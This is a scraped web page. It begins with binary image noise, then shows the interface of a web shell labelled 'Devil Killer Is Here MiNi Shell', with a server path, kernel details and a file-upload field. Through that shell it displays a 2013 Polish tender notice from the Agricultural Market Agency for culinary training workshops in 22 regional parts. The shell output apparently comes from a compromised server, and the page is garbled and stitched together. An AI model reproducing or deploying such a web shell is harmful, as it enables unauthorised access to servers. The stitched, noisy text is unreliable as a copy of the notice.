JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130313/100926-N-2013.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych</b><br>
<b>Numer ogłoszenia: 100926 - 2013; data zamieszczenia: 13.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Nowy Świat 6/12, 00-400 Warszawa, woj. mazowieckie, tel. 22 6617272, faks 22 661 73 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia.
2. Szczegółowy opis przedmiotu zamówienia, odpowiednio dla każdej części znajduje się w Istotnych Postanowieniach Umowy (IPU), w dokumencie Wytyczne i Harmonogram (załączniki  nr 2 do IPU)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  w zadaniu częściowym nr 1 (Oddział Terenowy ARR Gorzów Wielkopolski),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

2.  w zadaniu częściowym nr 2 (Oddział Terenowy ARR Gorzów Wielkopolski),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;

3.  w zadaniu częściowym nr 3 (Oddział Terenowy ARR Gorzów Wielkopolski),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

4.  w zadaniu częściowym nr 4 (Oddział Terenowy ARR Gorzów Wielkopolski),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;

5.  w zadaniu częściowym nr 5 (Oddział Terenowy ARR Opole),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

6.  w zadaniu częściowym nr 6 (Oddział Terenowy ARR Olsztyn),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

7.  w zadaniu częściowym nr 7 (Oddział Terenowy ARR Olsztyn),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

8.  w zadaniu częściowym nr 8 (Oddział Terenowy ARR Olsztyn),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

9.  w zadaniu częściowym nr 9 (Oddział Terenowy ARR Białystok),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;

10.  w zadaniu częściowym nr 10 (Oddział Terenowy ARR Białystok),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;

11.  w zadaniu częściowym nr 11 (Oddział Terenowy ARR Białystok),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 1.000,00 (słownie: jeden tysiąc) PLN brutto;

12.  w zadaniu częściowym nr 12 (Oddział Terenowy ARR Kraków),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

13.  w zadaniu częściowym nr 13 (Oddział Terenowy ARR Bydgoszcz),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

14.  w zadaniu częściowym nr 14 (Oddział Terenowy ARR Wrocław),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

15.  w zadaniu częściowym nr 15 (Oddział Terenowy ARR Poznań),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

16.  w zadaniu częściowym nr 16 (Oddział Terenowy ARR Poznań),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

17.  w zadaniu częściowym nr 17 (Oddział Terenowy ARR Warszawa),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

18.  w zadaniu częściowym nr 18 (Oddział Terenowy ARR Kielce),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

19.  w zadaniu częściowym nr 19 (Oddział Terenowy ARR Kielce),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

20.  w zadaniu częściowym nr 20 (Oddział Terenowy ARR Gdynia),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto;

21.  w zadaniu częściowym nr 21 (Oddział Terenowy ARR Gdynia),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 2.000,00 (słownie: dwa tysiące) PLN brutto;

22.  w zadaniu częściowym nr 22 (Oddział Terenowy ARR Gdynia),
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę tożsamą z przedmiotem zamówienia (tj. polegającą na prowadzeniu podobnego typu warsztatów kulinarnych) o wartości 4.000,00 (słownie: cztery tysiące) PLN brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  w zadaniu częściowym nr 1 (Oddział Terenowy ARR Gorzów Wielkopolski),
 dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

2.  w zadaniu częściowym nr 2 (Oddział Terenowy ARR Gorzów Wielkopolski),
 dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

3.  w zadaniu częściowym nr 3 (Oddział Terenowy ARR Gorzów Wielkopolski),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

4.  w zadaniu częściowym nr 4 (Oddział Terenowy ARR Gorzów Wielkopolski),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;

5.  w zadaniu częściowym nr 5 (Oddział Terenowy ARR Opole),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;

6.  w zadaniu częściowym nr 6 (Oddział Terenowy ARR Olsztyn),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada wiedzę na temat historii 
i praktycznego wykorzystywania dziczyzny w polskiej kuchni, popartą publikacjami w tym zakresie;

7.  w zadaniu częściowym nr 7 (Oddział Terenowy ARR Olsztyn),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada wiedzę na temat lokalnych tradycji kulinarnych popartą dyplomem za zajęcie I, II lub III miejsca w konkursach kulinarnych podczas imprez regionalnych promujących żywność tradycyjną i regionalną województwa warmińsko-mazurskiego;

8.  w zadaniu częściowym nr 8 (Oddział Terenowy ARR Olsztyn),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada wiedzę na temat historii 
i praktycznego wykorzystywania dziczyzny w polskiej kuchni, popartą publikacjami w tym zakresie;

9.  w zadaniu częściowym nr 9 (Oddział Terenowy ARR Białystok),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;

10.  w zadaniu częściowym nr 10 (Oddział Terenowy ARR Białystok),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;

11.  w zadaniu częściowym nr 11 (Oddział Terenowy ARR Białystok),
 dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

12.  w zadaniu częściowym nr 12 (Oddział Terenowy ARR Kraków),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

13.  w zadaniu częściowym nr 13 (Oddział Terenowy ARR Bydgoszcz),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;

14.  w zadaniu częściowym nr 14 (Oddział Terenowy ARR Wrocław),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada uprawnienia pedagogiczne np. kurs pedagogiczny;

15.  w zadaniu częściowym nr 15 (Oddział Terenowy ARR Poznań),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

16.  w zadaniu częściowym nr 16 (Oddział Terenowy ARR Poznań),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

17.  w zadaniu częściowym nr 17 (Oddział Terenowy ARR Warszawa),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

18.  w zadaniu częściowym nr 18 (Oddział Terenowy ARR Kielce),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada doświadczenie w prowadzeniu warsztatów z dziećmi w wieku 6-9 lat o podobnym charakterze w ciągu ostatnich trzech lat;

19.  w zadaniu częściowym nr 19 (Oddział Terenowy ARR Kielce),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

20.  w zadaniu częściowym nr 20 (Oddział Terenowy ARR Gdynia),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

21.  w zadaniu częściowym nr 21 (Oddział Terenowy ARR Gdynia),
dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy;

22. w zadaniu częściowym nr 22 (Oddział Terenowy ARR Gdynia),
a) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe 
o kierunku gastronomicznym/żywieniowym lub posiada dyplom mistrzowski w zawodzie kucharz wydany przez Cech Rzemieślniczy.
b) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe w zakresie żywienia lub dietetyki.
c) dysponuje przynajmniej jedną osobą, która posiada wykształcenie wyższe medyczne.
d) dysponuje przynajmniej jedną osobą, która posiada doświadczenie w prowadzeniu usług związanych ze zdrowiem publicznym oraz edukacją żywieniową środowiska szkolnego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>DOKUMENTY I OŚWIADCZENIA POTWIERDZAJĄCE SPEŁNIANIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:

1.W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda następujących dokumentów i oświadczeń:
a) w zakresie potwierdzenia warunku udziału w postępowaniu wskazanego w rozdziale VI ust. 1 - oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 3 do SIWZ; 
b) w zakresie potwierdzenia warunku udziału w postępowaniu wskazanego w rozdziale VI ust. 2 - wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (według wzoru stanowiącego Załącznik nr 4 do SIWZ).
c) w zakresie potwierdzenia warunku udziału w postępowaniu wskazanego w rozdziale VI ust. 2 wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz  informacją o podstawie do dysponowania tymi osobami (Załącznik nr 5 do SIWZ);
d) pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji osób zdolnych do wykonywania przedmiotowego zamówienia, jeżeli w wykazie, o którym mowa w ust. 1 pkt c) niniejszego rozdziału, wykonawca wskazał osoby, którymi będzie dysponował.
2. Dowodami, o których mowa w ust. 1 lit. b) są:
a) poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b) oświadczenia wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa 
w punkcie powyżej;
c) w przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w ust. 1 lit. b), zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej;
